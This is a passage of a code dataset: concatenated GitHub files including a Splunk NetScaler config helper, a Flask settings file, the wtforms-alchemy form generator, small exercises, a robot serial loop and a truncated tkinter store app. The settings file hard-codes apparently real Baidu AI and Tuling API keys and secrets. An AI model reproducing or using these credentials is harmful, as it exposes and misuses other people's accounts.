list of endpoints\n :return:\n \"\"\"\n filtered_tasks = []\n for endpoint in api_endpoints:\n dup = copy.deepcopy(task)\n dup[\"url\"] = dup[\"server_url\"]\n dup[\"username\"] = dup[\"account_name\"]\n dup[\"password\"] = dup[\"account_password\"]\n dup[\"duration\"] = int(dup[\"duration\"])\n dup[\"api_endpoint\"] = endpoint\n\n for k in (\"server_url\", \"account_name\", \"account_password\", \"content\"):\n del dup[k]\n filtered_tasks.append(dup)\n\n return filtered_tasks\n\n def _generate_all_duplicate_endpoints_warning(\n self, task, api_endpoints, logger=None\n ):\n \"\"\"\n It will log warning message\n :param task: (dict object) the input task object\n :param api_endpoints: (list) list of unique endpoints\n :param logger: (object)logging object\n :return:\n \"\"\"\n if not api_endpoints:\n logger.warn(\n \"All api endpoints in [ task=({}) , template=({}), appliance url=({}) ] \"\n \"duplicate with other tasks.\".format(\n task[\"name\"].replace(\"citrix_netscaler://\", \"\"),\n task[\"task_template\"].replace(self.metas[\"app_name\"] + \":\", \"\"),\n task[\"server_url\"],\n )\n )\n","repo_name":"asimchamp/Splunk_Apps","sub_path":"SplunkBase/2770_Splunk_Add-on_for_Citrix_NetScaler/8.2.1/Splunk_TA_citrix-netscaler/bin/citrix_netscaler_config.py","file_name":"citrix_netscaler_config.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73298602311","text":"# 数据库配置\nimport pymongo\nclient = pymongo.MongoClient(host=\"127.0.0.1\",port=27017)\nMONGO_DB = client[\"TuXingSunDB\"]\n\nfrom redis import Redis\nREDIS_DB = Redis(host=\"127.0.0.1\",port=6379,db=15)\n\n\n# 目录配置\nMUSIC_PATH = \"Music\"\nIMAGE_PATH = 
\"Image\"\nVOICE_PATH = \"Voices\"\nCHAT_PATH = \"Chats\"\n\n# RET配置\nRET = {\n \"code\":0,\n \"msg\":\"调用接口成功\",\n \"data\":[]\n}\n\n# URL配置\nLT_URL = \"http://qr.liantu.com/api.php?text=%s\"\n\n\n# BaiduAI配置:\nfrom aip import AipSpeech,AipNlp\n\nAPP_ID = '15217111'\nAPI_KEY = 'jE38mGiHGGe8LnmK2YdbGGoX'\nSECRET_KEY = 'KaoFdHZoaUWQsmpRgIEgxIGhdkDbW2V4'\n\nSPEECH_CLIENT = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\nNLP_CLIENT = AipNlp(APP_ID, API_KEY, SECRET_KEY)\n\nVOICE = {\n \"per\": 4,\n \"pit\": 8,\n \"spd\": 4,\n 'vol': 5,\n }\n\n# 图灵配置 :\nTL_URL = \"http://openapi.tuling123.com/openapi/api/v2\"\n\nTL_DATA = {\n\t\"reqType\":0,\n \"perception\": {\n \"inputText\": {\n \"text\": \"%s\"\n },\n },\n \"userInfo\": {\n \"apiKey\": \"c3a9ba0d958a43658a5acdcae50c13ae\",\n \"userId\": \"%s\"\n }\n}","repo_name":"ruoshuixuelabi/oldboyeduPython14qi","sub_path":"第9部分-flask+智能玩具(火龙果)/day128/今日代码/TuXingSun/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9954695415","text":"import inspect\nfrom collections import OrderedDict\nfrom decimal import Decimal\nfrom enum import Enum\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm.properties import ColumnProperty\nfrom sqlalchemy_utils import types\nfrom wtforms import (\n BooleanField,\n Field,\n FloatField,\n PasswordField,\n TextAreaField\n)\nfrom wtforms.widgets import CheckboxInput, TextArea\nfrom wtforms_components import (\n ColorField,\n DateField,\n DateIntervalField,\n DateTimeField,\n DateTimeIntervalField,\n DateTimeLocalField,\n DecimalField,\n DecimalIntervalField,\n EmailField,\n IntegerField,\n IntIntervalField,\n SelectField,\n StringField,\n TimeField\n)\nfrom wtforms_components.widgets import (\n ColorInput,\n DateInput,\n DateTimeInput,\n DateTimeLocalInput,\n EmailInput,\n NumberInput,\n TextInput,\n TimeInput\n)\n\nfrom .exc import (\n AttributeTypeException,\n InvalidAttributeException,\n UnknownTypeException\n)\nfrom .fields import CountryField, PhoneNumberField, WeekDaysField\nfrom .utils import (\n choice_type_coerce_factory,\n ClassMap,\n flatten,\n is_date_column,\n is_number,\n is_number_range,\n is_scalar,\n null_or_unicode,\n strip_string,\n translated_attributes\n)\n\n\nclass FormGenerator(object):\n \"\"\"\n Base form generator, you can make your own form generators by inheriting\n this class.\n \"\"\"\n\n # When converting SQLAlchemy types to fields this ordered dict is iterated\n # in given order. 
This allows smart type conversion of different inherited\n # type objects.\n TYPE_MAP = ClassMap((\n (sa.types.UnicodeText, TextAreaField),\n (sa.types.BigInteger, IntegerField),\n (sa.types.SmallInteger, IntegerField),\n (sa.types.Text, TextAreaField),\n (sa.types.Boolean, BooleanField),\n (sa.types.Date, DateField),\n (sa.types.DateTime, DateTimeField),\n (sa.types.Enum, SelectField),\n (sa.types.Float, FloatField),\n (sa.types.Integer, IntegerField),\n (sa.types.Numeric, DecimalField),\n (sa.types.Unicode, StringField),\n (sa.types.String, StringField),\n (sa.types.Time, TimeField),\n (sa.types.JSON, TextAreaField),\n (types.ArrowType, DateTimeField),\n (types.ChoiceType, SelectField),\n (types.ColorType, ColorField),\n (types.CountryType, CountryField),\n (types.DateRangeType, DateIntervalField),\n (types.DateTimeRangeType, DateTimeIntervalField),\n (types.EmailType, EmailField),\n (types.IntRangeType, IntIntervalField),\n (types.NumericRangeType, DecimalIntervalField),\n (types.PasswordType, PasswordField),\n (types.PhoneNumberType, PhoneNumberField),\n (types.ScalarListType, StringField),\n (types.URLType, StringField),\n (types.UUIDType, StringField),\n (types.WeekDaysType, WeekDaysField),\n ))\n\n WIDGET_MAP = OrderedDict((\n (BooleanField, CheckboxInput),\n (ColorField, ColorInput),\n (DateField, DateInput),\n (DateTimeField, DateTimeInput),\n (DateTimeLocalField, DateTimeLocalInput),\n (DecimalField, NumberInput),\n (EmailField, EmailInput),\n (FloatField, NumberInput),\n (IntegerField, NumberInput),\n (TextAreaField, TextArea),\n (TimeField, TimeInput),\n (StringField, TextInput)\n ))\n\n def __init__(self, form_class):\n \"\"\"\n Initializes the form generator\n\n :param form_class: ModelForm class to be used as the base of generation\n process\n \"\"\"\n self.form_class = form_class\n self.model_class = self.form_class.Meta.model\n self.meta = self.form_class.Meta\n self.TYPE_MAP.update(self.form_class.Meta.type_map)\n\n def create_form(self, form):\n \"\"\"\n Creates the form.\n\n :param form: ModelForm instance\n \"\"\"\n attrs = OrderedDict()\n for key, property_ in sa.inspect(self.model_class).attrs.items():\n if not isinstance(property_, ColumnProperty):\n continue\n if self.skip_column_property(property_):\n continue\n attrs[key] = property_\n\n for attr in translated_attributes(self.model_class):\n attrs[attr.key] = attr.property\n\n return self.create_fields(form, self.filter_attributes(attrs))\n\n def filter_attributes(self, attrs):\n \"\"\"\n Filter set of model attributes based on only, exclude and include\n meta parameters.\n\n :param attrs: Set of attributes\n \"\"\"\n if self.meta.only:\n attrs = OrderedDict([\n (key, prop)\n for key, prop in map(self.validate_attribute, self.meta.only)\n if key\n ])\n else:\n if self.meta.include:\n attrs.update([\n (key, prop)\n for key, prop\n in map(self.validate_attribute, self.meta.include)\n if key\n ])\n\n if self.meta.exclude:\n for key in self.meta.exclude:\n try:\n del attrs[key]\n except KeyError:\n if self.meta.attr_errors:\n raise InvalidAttributeException(key)\n return attrs\n\n def validate_attribute(self, attr_name):\n \"\"\"\n Finds out whether or not given sqlalchemy model attribute name is\n valid. 
Returns attribute property if valid.\n\n :param attr_name: Attribute name\n \"\"\"\n try:\n attr = getattr(self.model_class, attr_name)\n except AttributeError:\n try:\n translation_class = (\n self.model_class.__translatable__['class']\n )\n attr = getattr(translation_class, attr_name)\n except AttributeError:\n if self.meta.attr_errors:\n raise InvalidAttributeException(attr_name)\n else:\n return None, None\n try:\n if not isinstance(attr.property, ColumnProperty):\n if self.meta.attr_errors:\n raise InvalidAttributeException(attr_name)\n else:\n return None, None\n except AttributeError:\n raise AttributeTypeException(attr_name)\n return attr_name, attr.property\n\n def create_fields(self, form, properties):\n \"\"\"\n Creates fields for given form based on given model attributes.\n\n :param form: form to attach the generated fields into\n :param attributes: model attributes to generate the form fields from\n \"\"\"\n for key, prop in properties.items():\n column = prop.columns[0]\n try:\n field = self.create_field(prop, column)\n except UnknownTypeException:\n if not self.meta.skip_unknown_types:\n raise\n else:\n continue\n\n if not hasattr(form, key):\n setattr(form, key, field)\n\n def skip_column_property(self, column_property):\n \"\"\"\n Whether or not to skip column property in the generation process.\n\n :param column_property: SQLAlchemy ColumnProperty object\n \"\"\"\n if column_property._is_polymorphic_discriminator:\n return True\n\n return self.skip_column(column_property.columns[0])\n\n def skip_column(self, column):\n \"\"\"\n Whether or not to skip column in the generation process.\n\n :param column_property: SQLAlchemy Column object\n \"\"\"\n if not self.meta.include_foreign_keys and column.foreign_keys:\n return True\n\n if not self.meta.include_primary_keys and column.primary_key:\n return True\n\n if (not self.meta.include_datetimes_with_default and\n isinstance(column.type, sa.types.DateTime) and\n column.default):\n return True\n\n if isinstance(column.type, types.TSVectorType):\n return True\n\n if self.meta.only_indexed_fields and not self.has_index(column):\n return True\n\n # Skip all non columns (this is the case when using column_property\n # methods).\n if not isinstance(column, sa.Column):\n return True\n\n return False\n\n def has_index(self, column):\n \"\"\"\n Whether or not given column has an index.\n\n :param column: Column object to inspect the indexes from\n \"\"\"\n if column.primary_key or column.foreign_keys:\n return True\n table = column.table\n for index in table.indexes:\n if len(index.columns) == 1 and column.name in index.columns:\n return True\n return False\n\n def create_field(self, prop, column):\n \"\"\"\n Create form field for given column.\n\n :param prop: SQLAlchemy ColumnProperty object.\n :param column: SQLAlchemy Column object.\n \"\"\"\n kwargs = {}\n field_class = self.get_field_class(column)\n kwargs['default'] = self.default(column)\n kwargs['validators'] = self.create_validators(prop, column)\n kwargs['filters'] = self.filters(column)\n kwargs.update(self.type_agnostic_parameters(prop.key, column))\n kwargs.update(self.type_specific_parameters(column))\n if prop.key in self.meta.field_args:\n kwargs.update(self.meta.field_args[prop.key])\n\n if issubclass(field_class, DecimalField):\n if hasattr(column.type, 'scale'):\n kwargs['places'] = column.type.scale\n field = field_class(**kwargs)\n return field\n\n def default(self, column):\n \"\"\"\n Return field default for given column.\n\n :param column: SQLAlchemy Column 
object\n \"\"\"\n if column.default and is_scalar(column.default.arg):\n return column.default.arg\n else:\n if not column.nullable:\n return self.meta.default\n\n def filters(self, column):\n \"\"\"\n Return filters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n should_trim = column.info.get('trim', None)\n filters = column.info.get('filters', [])\n if (\n (\n isinstance(column.type, sa.types.String) and\n self.meta.strip_string_fields and\n should_trim is None\n ) or\n should_trim is True\n ):\n filters.append(strip_string)\n return filters\n\n def date_format(self, column):\n \"\"\"\n Returns date format for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n isinstance(column.type, sa.types.DateTime) or\n isinstance(column.type, types.ArrowType)\n ):\n return self.meta.datetime_format\n\n if isinstance(column.type, sa.types.Date):\n return self.meta.date_format\n\n def type_specific_parameters(self, column):\n \"\"\"\n Returns type specific parameters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n if (\n hasattr(column.type, 'enums') or\n column.info.get('choices') or\n isinstance(column.type, types.ChoiceType)\n ):\n kwargs.update(self.select_field_kwargs(column))\n\n date_format = self.date_format(column)\n if date_format:\n kwargs['format'] = date_format\n\n if hasattr(column.type, 'region'):\n kwargs['region'] = column.type.region\n\n kwargs['widget'] = self.widget(column)\n return kwargs\n\n def widget(self, column):\n \"\"\"\n Returns WTForms widget for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n widget = column.info.get('widget', None)\n if widget is not None:\n return widget\n\n kwargs = {}\n\n step = column.info.get('step', None)\n if step is not None:\n kwargs['step'] = step\n else:\n if isinstance(column.type, sa.types.Numeric):\n if (\n column.type.scale is not None and\n not column.info.get('choices')\n ):\n kwargs['step'] = self.scale_to_step(column.type.scale)\n\n if kwargs:\n widget_class = self.WIDGET_MAP[\n self.get_field_class(column)\n ]\n return widget_class(**kwargs)\n\n def scale_to_step(self, scale):\n \"\"\"\n Returns HTML5 compatible step attribute for given decimal scale.\n\n :param scale: an integer that defines a Numeric column's scale\n \"\"\"\n return str(pow(Decimal('0.1'), scale))\n\n def type_agnostic_parameters(self, key, column):\n \"\"\"\n Returns all type agnostic form field parameters for given column.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n kwargs['description'] = column.info.get('description', '')\n kwargs['label'] = column.info.get('label', key)\n return kwargs\n\n def select_field_kwargs(self, column):\n \"\"\"\n Returns key value args for SelectField based on SQLAlchemy column\n definitions.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n kwargs = {}\n kwargs['coerce'] = self.coerce(column)\n if isinstance(column.type, types.ChoiceType):\n choices = column.type.choices\n if (\n Enum is not None and\n isinstance(choices, type)\n and issubclass(choices, Enum)\n ):\n kwargs['choices'] = [\n (choice.value, str(choice)) for choice in choices\n ]\n else:\n kwargs['choices'] = choices\n elif 'choices' in column.info and column.info['choices']:\n kwargs['choices'] = column.info['choices']\n else:\n kwargs['choices'] = [\n (enum, enum) for enum in column.type.enums\n ]\n return kwargs\n\n def coerce(self, column):\n \"\"\"\n Returns coerce callable for given column\n\n :param column: SQLAlchemy Column 
object\n \"\"\"\n if 'coerce' in column.info:\n return column.info['coerce']\n if isinstance(column.type, types.ChoiceType):\n return choice_type_coerce_factory(column.type)\n try:\n python_type = column.type.python_type\n except NotImplementedError:\n return null_or_unicode\n\n if column.nullable and issubclass(python_type, str):\n return null_or_unicode\n return python_type\n\n def create_validators(self, prop, column):\n \"\"\"\n Returns validators for given column\n\n :param column: SQLAlchemy Column object\n \"\"\"\n validators = [\n self.required_validator(column),\n self.length_validator(column),\n self.unique_validator(prop.key, column),\n self.range_validator(column)\n ]\n if isinstance(column.type, types.EmailType):\n validators.append(self.get_validator('email'))\n if isinstance(column.type, types.URLType):\n validators.append(self.get_validator('url'))\n validators = flatten([v for v in validators if v is not None])\n\n validators.extend(self.additional_validators(prop.key, column))\n return validators\n\n def required_validator(self, column):\n \"\"\"\n Returns required / optional validator for given column based on column\n nullability and form configuration.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (not self.meta.all_fields_optional and\n not column.default and\n not column.nullable):\n\n type_map = self.meta.not_null_validator_type_map\n try:\n return type_map[column.type]\n except KeyError:\n if isinstance(column.type, sa.types.TypeDecorator):\n type_ = column.type.impl\n\n try:\n return type_map[type_]\n except KeyError:\n pass\n if self.meta.not_null_validator is not None:\n return self.meta.not_null_validator\n return self.get_validator('optional')\n\n def get_validator(self, name, **kwargs):\n attr_name = '%s_validator' % name\n attr = getattr(self.meta, attr_name)\n if attr is None:\n return attr\n\n return attr(**kwargs)\n\n def additional_validators(self, key, column):\n \"\"\"\n Returns additional validators for given column\n\n :param key: String key of the column property\n :param column: SQLAlchemy Column object\n \"\"\"\n validators = []\n if key in self.meta.validators:\n try:\n validators.extend(self.meta.validators[key])\n except TypeError:\n validators.append(self.meta.validators[key])\n\n if 'validators' in column.info and column.info['validators']:\n try:\n validators.extend(column.info['validators'])\n except TypeError:\n validators.append(column.info['validators'])\n return validators\n\n def unique_validator(self, key, column):\n \"\"\"\n Returns unique validator for given column if column has a unique index\n\n :param key: String key of the column property\n :param column: SQLAlchemy Column object\n \"\"\"\n if column.unique:\n return self.get_validator(\n 'unique',\n column=getattr(self.model_class, key),\n get_session=self.form_class.get_session\n )\n\n def range_validator(self, column):\n \"\"\"\n Returns range validator based on column type and column info min and\n max arguments\n\n :param column: SQLAlchemy Column object\n \"\"\"\n min_ = column.info.get('min')\n max_ = column.info.get('max')\n\n if min_ is not None or max_ is not None:\n if is_number(column.type) or is_number_range(column.type):\n return self.get_validator('number_range', min=min_, max=max_)\n elif is_date_column(column):\n return self.get_validator('date_range', min=min_, max=max_)\n elif isinstance(column.type, sa.types.Time):\n return self.get_validator('time_range', min=min_, max=max_)\n\n def length_validator(self, column):\n \"\"\"\n Returns length 
validator for given column\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n isinstance(column.type, sa.types.String) and\n hasattr(column.type, 'length') and\n column.type.length\n ):\n return self.get_validator('length', max=column.type.length)\n\n def get_field_class(self, column):\n \"\"\"\n Returns WTForms field class. Class is based on a custom field class\n attribute or SQLAlchemy column type.\n\n :param column: SQLAlchemy Column object\n \"\"\"\n if (\n 'form_field_class' in column.info and\n column.info['form_field_class']\n ):\n return column.info['form_field_class']\n if 'choices' in column.info and column.info['choices']:\n return SelectField\n if (\n column.type not in self.TYPE_MAP and\n isinstance(column.type, sa.types.TypeDecorator)\n ):\n check_type = column.type.impl\n else:\n check_type = column.type\n\n try:\n column_type = self.TYPE_MAP[check_type]\n\n if inspect.isclass(column_type) and issubclass(column_type, Field):\n return column_type\n else:\n return column_type(column)\n except KeyError:\n raise UnknownTypeException(column)\n","repo_name":"kvesteri/wtforms-alchemy","sub_path":"wtforms_alchemy/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":20142,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"27"} +{"seq_id":"71534559433","text":"def count_paths(F):\n\n # initialize the size, and two memorization tables, T and T2\n\n n = len(F)\n T = [[0 for i in range(n)] for i in range(n)]\n T2 = [[0 for i in range(n)] for i in range(n)]\n\n # base case (at T[-1][-1])\n # if there is a mushroom, we should add it, otherwise it should be blank (given there is a path)\n if F[-1][-1] == \"m\":\n\n T[-1][-1] = 1\n\n # base case for T2, where there exists a path\n T2[-1][-1] = 1\n\n # loop through all n^2 elements in T and T2, where T[-y][-x] and T2[-y][-x] represents the value at (-x, -y) respectively\n for y in range(1, n + 1):\n\n for x in range(1, n + 1):\n\n # ignore (-1, -1) since we defined base case\n if x == 1 and y == 1:\n continue\n\n # if we are at bottom row or right-most column, the elements below and the elements to the right respectively, should not exist (so defined as -inf)\n if x == 1:\n right = -float(\"inf\")\n else:\n right = T[-y][-x + 1]\n if y == 1:\n down = -float(\"inf\")\n else:\n down = T[-y + 1][-x]\n\n tile = F[-y][-x] # define tile\n\n # depending on if the tile is a tree, mushroom, or blank\n if tile == \"t\":\n T[-y][-x] = -float(\"inf\")\n if tile == \"m\":\n T[-y][-x] = 1 + max(right, down)\n if tile == \"x\":\n T[-y][-x] = max(right, down)\n\n # solving for T2 is defined as if down and right are the same value, then that must mean there exists another path to the end\n if right == down and down != -float(\"inf\"):\n\n T2[-y][-x] = T2[-y][-x + 1] + T2[-y + 1][-x]\n else:\n\n # finds which direction is the max mushroom direction\n mushrooms = max(right, down)\n if right == mushrooms:\n\n T2[-y][-x] = T2[-y][-x + 1]\n else:\n\n T2[-y][-x] = T2[-y + 1][-x]\n\n return T2[0][0]\n","repo_name":"Twigums/6.006","sub_path":"count_paths.py","file_name":"count_paths.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25299948185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 14 21:44:26 2022\r\n\r\n@author: Johnny Tsao\r\n\"\"\"\r\n\r\nimport requests\r\nimport urllib.request\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as 
np\r\n\r\nurl = 'https://www.utrecsports.org/facilities/facility-schedules'\r\nresponse = requests.get(url)\r\n\r\nsoup = BeautifulSoup(response.content,\"html.parser\")\r\ntables = soup.find_all(\"table\")\r\nrows = []\r\nfor row in tables[1].findAll(\"tr\"):\r\n cols = []\r\n for col in row.findAll(\"td\"):\r\n cols.append(col.text)\r\n rows.append(cols)\r\n \r\ndays = []\r\ngym = \"\"\r\ndata = []\r\n\r\ntextfile = open(\"data.txt\",\"w\")\r\n\r\nfor cols in rows:\r\n if(len(cols) == 1):\r\n title = cols[0]\r\n if(len(title) < 10):\r\n gym = title\r\n else:\r\n days.append(title)\r\n if(len(cols) == 3):\r\n string = cols[2]\r\n elem =string.split(\" \")\r\n search_word = 'Informal Rec Badminton'\r\n if(string[:len(search_word)] == 'Informal Rec Badminton'):\r\n print(days[-1], cols[1])\r\n print(gym, cols[0])\r\n data.append([days[-1] + \" \" + cols[1],\r\n gym + \" \" + cols[0]])\r\n textfile.write(\"{:25s} {:15s} {:5s} {:15s} \\n\"\\\r\n .format(days[-1], cols[1], gym,cols[0]))\r\n print(\" \")\r\n \r\ntextfile.close()\r\n \r\n","repo_name":"Johnny880724/UT_REC","sub_path":"UT_REC_download.py","file_name":"UT_REC_download.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16361898635","text":"#get number value\n#display \"tip values\" of 15% and 20%\n\nprint(\"Harro, please tell me a fictional bill amount:\")\nbase = float(input())\n\ntip_15 = base*0.15\ntip_20 = base*0.20\ntip_total_15 = base+tip_15\ntip_total_20 = base+tip_20\n\nprint()\nprint(\"Ok, so 15% of\", base, \"is\", tip_15, \"and 20% would be\", tip_20,\".\")\nprint(\"Therefor I recommend that you pay between\", tip_total_15, \"and\",\\\n tip_total_20, \"in total!\")\n\n","repo_name":"PunkIslamist/Python-for-the-absolute-beginner","sub_path":"challenge_2_3.py","file_name":"challenge_2_3.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27388956451","text":"from onl.platform.base import *\r\nfrom onl.platform.netberg import *\r\n\r\nclass OnlPlatform_x86_64_netberg_aurora_610_r0(OnlPlatformNetberg,\r\n OnlPlatformPortConfig_48x25_8x100):\r\n PLATFORM='x86-64-netberg-aurora-610-r0'\r\n MODEL=\"AURORA610\"\r\n SYS_OBJECT_ID=\".610.1\"\r\n\r\n def baseconfig(self):\r\n os.system(\"insmod /lib/modules/`uname -r`/onl/netberg/x86-64-netberg-aurora-610/gpio-ich.ko\")\r\n #self.insmod('gpio-ich.ko')\r\n self.insmod('i2c-gpio')\r\n self.insmod('net_platform')\r\n self.insmod('net_psoc')\r\n os.system(\"echo net_cpld 0x77 > /sys/bus/i2c/devices/i2c-0/new_device\")\r\n self.insmod('net_cpld')\r\n self.insmod('swps')\r\n self.insmod('vpd')\r\n os.system(\"/lib/platform-config/x86-64-netberg-aurora-610-r0/onl/healthstatus.sh &\")\r\n\r\n return True\r\n\r\n","repo_name":"opencomputeproject/OpenNetworkLinux","sub_path":"packages/platforms/netberg/x86-64/aurora-610/platform-config/r0/src/python/x86_64_netberg_aurora_610_r0/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":532,"dataset":"github-code","pt":"27"} +{"seq_id":"17299304640","text":"\"\"\"Video - Right Motor.\"\"\"\nimport sys\nimport serial\nimport time\nfrom leftmotortest import moveLeftMotor\nfrom rightmotortest import moveRightMotor\nfrom motorstest import moveMotors\nfrom pebbletest import movePebbles\nfrom ledtest import ledOn\nfrom changeData import changeData\n\n# Serial 
setup\nser = serial.Serial('/dev/ttyACM0', 115200)\nif ser.isOpen() is False:\n ser.open()\ntime.sleep(2)\n# NOTE: \"send\" is not defined in this file; it is assumed to be a queue-like\n# object (e.g. multiprocessing.Queue) injected by the process that runs this script.\nsend.put(\"got connection\")\n\n# State flags polled by the main loop; \"led\" and \"sensors\" keys are included because the loop reads them.\nflag = {\"leftmotor\": \"open\", \"rightmotor\": \"open\", \"pebbles\": \"None\", \"led\": \"None\", \"sensors\": \"None\"}\n\nwhile True:\n if ser.isOpen() is False:\n ser.open()\n msg = str((ser.readline()).decode(\"utf-8\"))\n msg = msg[0:len(msg)-2].split(',')\n ser.flush()\n if msg[0] == \"P\":\n send.put(\"pressure \" + msg[1])\n send.put(\"tempPS \" + msg[2])\n send.put(\"gyro \" + msg[3] + \" \" + msg[4] + \" \" + msg[5])\n send.put(\"accel \" + msg[6] + \" \" + msg[7] + \" \" + msg[8])\n send.put(\"tempIMU \" + msg[9])\n elif msg[0] == \"S\":\n send.put(\"temp \" + msg[1])\n send.put(\"metal \" + msg[2])\n send.put(\"ph \" + msg[3])\n \n #print(\"gyro \" + msg[0] + \" \" + msg[1] + \" \" + msg[2])\n if flag[\"leftmotor\"] == \"open\" and flag[\"rightmotor\"] == \"open\":\n moveMotors(ser, \"open\")\n flag[\"leftmotor\"] = \"None\"\n flag[\"rightmotor\"] = \"None\"\n elif flag[\"leftmotor\"] == \"close\" and flag[\"rightmotor\"] == \"close\":\n moveMotors(ser, \"close\")\n flag[\"leftmotor\"] = \"None\"\n flag[\"rightmotor\"] = \"None\"\n elif flag[\"leftmotor\"] != \"None\":\n moveLeftMotor(ser, flag[\"leftmotor\"])\n flag[\"leftmotor\"] = \"None\"\n elif flag[\"rightmotor\"] != \"None\":\n moveRightMotor(ser, flag[\"rightmotor\"])\n flag[\"rightmotor\"] = \"None\"\n if flag[\"pebbles\"] != \"None\":\n movePebbles(ser, flag[\"pebbles\"])\n flag[\"pebbles\"] = \"None\"\n if flag[\"led\"] != \"None\":\n ledOn(ser, flag[\"led\"])\n flag[\"led\"] = \"None\"\n if flag[\"sensors\"] != \"None\":\n changeData(ser, flag[\"sensors\"])\n flag[\"sensors\"] = \"None\"\n #print(flag)\n #send.put(directions[0] + directions[1] + directions[2])\n","repo_name":"EasternEdgeRobotics/Software_2019","sub_path":"raspi-4/serialComm.py","file_name":"serialComm.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17162778969","text":"from tkinter import *\nimport sqlite3\nimport tkinter.messagebox\nimport datetime\nimport math\nimport os\nimport random\n\n#conn = sqlite3.connect('E:\\Projects\\Python\\Store Management Software\\Database\\store.db')\nconn = sqlite3.connect('store.db')\n\nc = conn.cursor()\nc.execute(\"CREATE TABLE IF NOT EXISTS `transactions` ( `id`\tINTEGER PRIMARY KEY AUTOINCREMENT, `product_name`\tTEXT,\"\n \"`quantity`\tINTEGER, `amount`\tINTEGER, `date`\tTEXT);\")\ndate = datetime.datetime.now().date()\nproduct_list = []\nproduct_quantity = []\nproduct_price = []\nproduct_id = []\n\nlabels_list = []\n\n\nclass Application:\n def __init__(self, master, *args, **kwargs):\n\n self.chaneisThere = 1\n\n self.master = master\n self.left = Frame(master, width=700, height=768, bg='white')\n self.left.pack(side=LEFT)\n\n self.right = Frame(master, width=666, height=768, bg='lightblue')\n self.right.pack(side=RIGHT)\n\n self.heading = Label(self.left, text='Store Management', font=('arial 40 bold'), bg='white')\n self.heading.place(x=0, y=0)\n\n self.date_1 = Label(self.right, text=\"Today's Date: \" + str(date), font=('arial 16 bold'), bg='lightblue')\n self.date_1.place(x=0, y=0)\n\n self.tproduct = Label(self.right, text=\"Products\", font=('arial 19 bold'), bg='lightblue')\n self.tproduct.place(x=0, y=60)\n\n self.tquantity = Label(self.right, text=\"Quantity\", font=('arial 19 bold'), bg='lightblue')\n self.tquantity.place(x=300, y=60)\n\n self.tamount = Label(self.right, text=\"Amount\", 
font=('arial 19 bold'), bg='lightblue')\n self.tamount.place(x=500, y=60)\n\n self.enterid = Label(self.left, text='Enter ID', font=('arial 18 bold'), bg='white')\n self.enterid.place(x=0, y=80)\n\n self.enteride = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.enteride.place(x=190, y=80)\n self.enteride.focus()\n\n\n self.search_btn = Button(self.left, text='Search', width=22, height=2, bg='orange', command=self.ajax)\n self.search_btn.place(x=350, y=120)\n\n self.productname = Label(self.left, text='', font=('arial 18 bold'), bg='white', fg='steelblue')\n self.productname.place(x=0, y=250)\n\n self.pprice = Label(self.left, text='', font=('arial 18 bold'), bg='white', fg='steelblue')\n self.pprice.place(x=0, y=290)\n\n self.total_label = Label(self.right, text='', font=('arial 40 bold'), bg='lightblue', fg='white')\n self.total_label.place(x=0, y=600)\n\n self.master.bind(\"\", self.ajax)\n self.master.bind(\"\", self.ajax)\n self.master.bind(\"\", self.generate_bill)\n\n\n\n def ajax(self, *args, **kwargs):\n self.get_id = self.enteride.get()\n query = \"SELECT * FROM inventory WHERE id=?\"\n result = c.execute(query, (self.get_id,))\n for self.r in result:\n self.get_id = self.r[0]\n self.get_name = self.r[1]\n self.get_price = self.r[4]\n self.get_stock = self.r[2]\n self.productname.configure(text=\"Product's Name: \" + str(self.get_name))\n self.pprice.configure(text=\"Price: \" + str(self.get_price))\n\n self.quantity_1 = Label(self.left, text='Enter Quantity', font=('arial 18 bold'), bg='white')\n self.quantity_1.place(x=0, y=370)\n\n self.quantity_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.quantity_e.place(x=190, y=370)\n self.quantity_e.focus()\n\n self.discount_1 = Label(self.left, text='Enter Discount', font=('arial 18 bold'), bg='white')\n self.discount_1.place(x=0, y=410)\n\n self.discount_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.discount_e.place(x=190, y=410)\n self.discount_e.insert(END, 0)\n\n self.add_to_btn = Button(self.left, text='Add To Cart', width=22, height=2, bg='orange',\n command=self.add_to_cart)\n self.add_to_btn.place(x=350, y=450)\n\n self.change_1 = Label(self.left, text='Given Amount', font=('arial 18 bold'), bg='white')\n self.change_1.place(x=0, y=550)\n\n self.change_e = Entry(self.left, width=25, font=('arial 18 bold'), bg='lightblue')\n self.change_e.place(x=190, y=550)\n\n self.change_butn = Button(self.left, text='Calculate Change', width=22, height=2, bg='orange', command=self.change)\n 